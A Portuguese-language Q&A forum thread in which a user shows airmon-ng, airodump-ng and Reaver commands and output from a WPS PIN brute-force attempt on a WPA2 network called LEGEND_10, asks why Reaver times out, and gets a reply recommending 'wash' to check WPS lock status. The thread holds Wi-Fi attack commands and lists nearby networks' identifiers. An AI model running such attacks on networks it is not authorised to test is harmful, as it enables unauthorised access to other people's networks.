Problema com aircrack-ng?

0

Estou usando o Ubuntu 14.04 LTS.

Adaptador sem fio: Atheros Communications, Inc. AR9271 802.11n

Driver sem fio: Ath9k_htc

Versão Aircrack: Aircrack-ng-1.2-Rc1

Versão do Reaver: Reaver-1.4

(libpcap0.8_1.4.0-2_i386, Sqlite3-dev e outras bibliotecas necessárias também estão instaladas)

Problema: Quando eu executo o comando "airmon-ng start wlan1" Ele fornece a seguinte saída:

root@legend-N150P:~# airmon-ng start wlan1
Found 4 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

PID Name
487 avahi-daemon
489 avahi-daemon
716 NetworkManager
741 wpa_supplicant

PHY Interface   Driver      Chipset

phy0    wlan0       wl      Broadcom Corporation BCM4313 802.11bgn Wireless Network Adapter (rev 01)
phy3    wlan1       ath9k_htc   Atheros Communications, Inc. AR9271 802.11n
    (mac80211 monitor mode vif enabled for [phy3]wlan1 on [phy3]wlan1mon)
    (mac80211 station mode vif disabled for [phy3]wlan1)

Então eu digitei o comando "airodum-ng wlan1mon" Ele deu a seguinte saída:

CH  8 ][ BAT: 2 hours 56 mins ][ Elapsed: 1 min ][ 2015-02-23 08:51                   

BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

5C:F9:6A:C4:88:DE  -42      135        1    0   6  54e  WPA2 CCMP   PSK  LEGEND_10    
90:F6:52:F0:56:38  -88       55       12    0  11  54 . OPN              Al-Afzal 2   
02:0C:E7:34:30:5F  -89       15        0    0   1  54e. WPA2 CCMP   PSK  AndroidAP    
2C:E4:12:21:51:14  -91       45        0    0  11  54   WPA2 CCMP   PSK  Usman Ahmad  
BC:98:89:4C:3D:0B  -91        2        0    0   6  54e. WPA2 CCMP   PSK  PTCL-BB      

BSSID              STATION            PWR   Rate    Lost    Frames  Probe              

(not associated)   5C:F9:6A:C4:88:DE  -43    0 - 1      0       28                     
(not associated)   00:1B:B1:EE:9A:DB  -75    0 - 1      0        7                     

Agora eu quero hackear uma rede com o ESSID: LEGEND_10 ... Para isso eu digitei o comando "Reaver -i wlan1mon -b 5C: F9: 6A: C4: 88: DE -vv" Ele deu a seguinte saída:

root@legend-N150P:~# reaver -i wlan1mon -b 5C:F9:6A:C4:88:DE -vv

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>

[+] Waiting for beacon from 5C:F9:6A:C4:88:DE
[+] Switching wlan1mon to channel 6
[+] Associated with 5C:F9:6A:C4:88:DE (ESSID: LEGEND_10)
[+] Trying pin 12345670
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurr
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request

Qual é o problema?

    
por Areesha Ahmed 23.02.2015 / 05:14

1 resposta

0

Primeiro, verifique se o roteador que você quer hackear habilita wps ou não usa esse código;

wash -i wlan1mon

Se o bloqueio de wps for "não", somente o reaver poderá quebrar a senha, mas, se estiver bloqueado, você não poderá usar o reaver.

Você pode ter uma interface diferente em vez de "wlan0mon" como wlan0, mon0 etc.

    
por Opprude 05.01.2016 / 17:19